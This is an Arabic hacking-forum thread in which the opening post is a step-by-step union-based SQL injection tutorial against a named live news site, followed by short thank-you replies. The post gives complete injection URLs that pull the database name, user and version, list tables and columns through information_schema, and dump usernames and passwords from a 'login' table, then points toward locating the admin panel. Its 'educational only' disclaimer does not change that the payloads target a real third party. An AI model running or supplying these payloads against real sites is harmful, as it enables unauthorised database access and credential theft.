ثغرة sql ج 2

ثغرة sql ج 2


النتائج 1 إلى 7 من 7

الموضوع: ثغرة sql ج 2

  1. #1

    افتراضي ثغرة sql ج 2

    بسم الله الرحمن الرحيم
    والصلاة والسلام على رسول لله وعلى اله وصحبه وسلم
    وبسم الله نبدأ اعوذ بالله من الشيطان الرجيم بسم الله الرحمن الرحيم
    والحمد لله الذي هدانا الى هذا وما كنا لنهتدي لو لم يهدينا الله
    السلام عليكم ورحمة الله وبركاته
    ثغرة sql جزء 2
    انا شرحت لكم ثغرة sql جزء 1
    وقمنا بشرح معرفة الموقع اذا كان مصاب بهذه الثغرة sql ام لا و تعلمنا كيفية معرفة عدد الأعمدة و معرفة الأعمدة المصابة لمشاهدة الموضوع اضغط هنا
    اليوم شرحنا موسع جدا جدا ويجب تشغيل العقل 100% فاليوم الدرس الاخير لمعرفة هذه الثغرة
    سنتعلم كيفية استخراج اسم القاعدة و اسم مستخدم القاعدة و إصدار القاعدة إضافة الى ذلك معرفة عدد جداول القاعدة + معرفة اعمدة الجداول + استخراج ال user و pass
    الدرس طويل جدا ولكن انا متأكد لن تخرج قبل فهمه ولكن اول شئ عليك صبر و التركيز ولا داعي للتفكير بشرح روابط
    نبدأ على بركة لله عز وجل:
    اولا)أستخراج أسم القاعدة و إصدار القاعدة واسم مستخدم القاعدة في أمر واحد
    لدينا هذا الموقع evt-me.com/newsDetail.php?id=8
    وقد قمنا في الدرس السابق معرفة الأعمدة المصابة
    ووجدنا ان الأعمدة المصابة هي 2 +3
    والان نقوم بحذف العمود 2 من رابط ونضع بدل منه
    كود HTML:
    concat(database(),0x3e,user(),0x3e,@@version)
    بمعنا اخر يصبح الرابط
    كود HTML:
    http://www.evt-me.com/newsDetail.php?id=-8 union select 1,concat(database(),0x3e,user(),0x3e,@@version),3,4,5,6,7--
    database():لاستخراج اسم القاعدة:evt_evt
    user():استخراج اسم مستخدم القاعدة: evt_badr@localhost
    version@@:معرفة إصدار القاعدة:5.1.63-cll
    اما بالنسبة ل 0x3e فهي لتفصل بين كل واحد يعني مشان ما يطلعوا كلهم جملة واحد


    ثانيا)أستخراج أسماء الجداول من اسم القاعدة
    عن طريق الإمر التالي لاحظوو
    كود HTML:
    concat(table_name)
    نحذف الامر السابق ونضع الكود الموجود في الاعلى لأستخراج اسماء الجداول من اسم القاعدة
    ونضع في نهاية رابط قبل ال - -
    from information_schema.tables where table_schema=اسم القاعدة المشفر
    لدينا هذا الموقع
    لمشاهدة الموقع أضغط هنا
    هذا موقع لتشفير تضغط اولا على sql char encoder الموجودة في يسار الصفحة
    ونكتب اسم القاعدة فيقوم بتشفيرها ثم نضع التشفير بدل من كلمة ((اسم القاعدة المشفر))
    اذا يصبح الكود في النهاية
    كود HTML:
    from information_schema.tables where table_schema=0x6576745f657674
    تمااااام
    اذا الموقع في النهاية هكذا
    كود HTML:
    http://evt-me.com/newsDetail.php?id=-8 union select 1,concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=0x6576745f657674
    استخرجنا الان اسماء الجداول من القاعدة غالبا يكون ال username & pass
    في جدول Login او user وغيرها ...يعني بتكون واضحة جدا
    نجد اسماء الجداول كثار ولكن انا وجدت في هذا الموقع جدول باسم login
    اذا هذا الذي فيه ال user و pass
    بقي خطوتان فقط ونعرف ال pass & user مممممم
    الخطوة الأولى) معرفة اسماء الأغمدة في جدول login اولا نذهب لموقع التشفير و نشفر كلمة Login
    ثم نقوم بمحي ما كتبناه في العمود 2
    ووضع
    كود HTML:
    group_concat(column_name)
    والان نضع في نهاية رابط قبل - - ما يلي
    كود HTML:
    from information_schema.columns where table_name=0x6c6f67696e
    0x6c6f67696e اسم الجدول login مشفر اذا نحذف ما كتبناه سابقا و نضع الكود الموجود حالي اي يصبح الرابط في النهاية
    كود HTML:
    http://www.evt-me.com/newsDetail.php?id=-8 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name=0x6c6f67696e
    نجد انه قد استخرج لنا اسماء العواميد كلها
    id
    pass
    username
    position
    fullname
    اكيد انا محتاج username و pass اما fullname فأكيد ما بدي لانو ما بدي اتعرف على admin ههههه
    طيب والان الخطوة الاخيرة
    تضع بدل العمود المصاب 2 هذا الكود
    كود HTML:
    concat(pass,0x3e,username)
    طيب اكيد username و pass حسب ما تجدهم بالجدول
    يعني لو جدتهم
    user
    password
    كان بدك تكتب هيك
    (
    كود HTML:
    concat(pass,0x3e,user
    على حسب ما مكتوب بتكتب تمااام
    والان نكتب في نهاية الرابط قبل ال - - ما يلي
    كود HTML:
    from login
    طبعا على حسب اسم الجدول يعني لو كان user كان from user
    الفكرة وصلت
    والان نضغط على Enter ومبروك عليك ال pass&user
    والان نذهب لبرنامج الهافج مشان نلاقي مسار لوحة التحكم
    طبعا الشباب شارحين عليه كثير واذا طلبتوا مني بعطيك شرح وافي
    انا برئ من كل من يستخدم الطريقة ضد العرب و المسلمون
    الغرض تعليمي فقط..
    الحمد لله الذي علمنا هذا و جعلنا نعلم غيرنا
    لا إله الا انت سبحانك إني كنت من الظالمين
    للأسئلة و الأستفسارات اترك تعليق يتضمن السؤال وان شاء الله سيتم الرد
    او ارسل رسالة على البريد الإلكتروني
    [email protected]
    facebook:Omar Al Lord
    والصلاة والسلام على رسول لله وعلى اله وصحبه وسلم
    بالله عليك لا تخرج قبل ان تصلي على نبي 3 مرات مو ضروري تكتبهم بتعليق ولكن في قلبك
    والحمد لله رب العرش العظيم
    وشكرا جزيلا على القراءة
    حفظكم الله وهداكم وهدانا
    والسلام عليكم ورحمة الله وبركاته
    لا تنسونا من الدعاء
    تحياتي


    We are Syrians
    We are Free
    Sunni, Shia, christian
    I don't care We are all free



    Channel: http://www.youtube.com/MacBook3rabi
    Twitter: https://twitter.com/macbook3arabi
    We are White Hats hackers, We don't Hack we protect

  2. #2
    هكر متميز الصورة الرمزية موآدع
    تاريخ التسجيل
    Jul 2012
    الدولة
    السعودية | جـــدة
    المشاركات
    720

    افتراضي رد: ثغرة sql ج 2

    مشاء الله موضوع جميل يعطيك العافية
    عجبني ترتيب الموضوع

  3. #3

    افتراضي رد: ثغرة sql ج 2

    تنسيق جميل

    لكن ما حبيت اتابع هالموضوع الا لين افهم الموضوع اللي قبله

    تقبل مروري

  4. #4
    :: مشرف قسم الباك تراك :: الصورة الرمزية يارب رحمتك
    تاريخ التسجيل
    May 2012
    الدولة
    روح العرب
    المشاركات
    1,147

    افتراضي رد: ثغرة sql ج 2

    مشكور وماقصرت ...........


    youtube

    [ما يلفظ من قول الا لديه رقيب عتيد]
    [ آفعل مآ شئت فكمآ تديُن تدآن ]

    hacker ▎security ▎no Breach>>
    [ mohamed -kareb ]


  5. #5

    افتراضي رد: ثغرة sql ج 2

    مشكور يا بطل

    الله يعطيك العافية

  6. #6

    افتراضي رد: ثغرة sql ج 2

    ما شاء الله
    موضوع رائع و طرح ولا اروع
    الله يعطيك العافيه

  7. #7

    افتراضي رد: ثغرة sql ج 2

    جزاك الله خيراااااااا

المواضيع المتشابهه

  1. ثغرة sql ج1
    بواسطة Omar hcj في المنتدى قسم الثغرات
    مشاركات: 7
    آخر مشاركة: 08-09-2012, 06:35 PM
  2. مشكله بي ثغره vb3.8.6، ثغرة vb 3.8.6 ثغرة في بي 3.8.6 ثغرة 3.8.6 ثغرة vbulletin 3.8.6
    بواسطة هكر لايرحم في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 3
    آخر مشاركة: 02-26-2012, 02:44 AM
  3. ثغرة remote file inclusion +ثغرة جديدة +طريقة الإستغلال
    بواسطة millen!um في المنتدى قسم الثغرات
    مشاركات: 17
    آخر مشاركة: 01-29-2012, 12:11 AM
  4. ثغرة لرفع الشيل مباشرة ثغرة ابلود upload
    بواسطة The shadow في المنتدى قسم الثغرات
    مشاركات: 20
    آخر مشاركة: 12-21-2011, 06:05 AM
  5. هل هذه ثغرة
    بواسطة طير الباز في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 5
    آخر مشاركة: 05-13-2011, 08:27 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •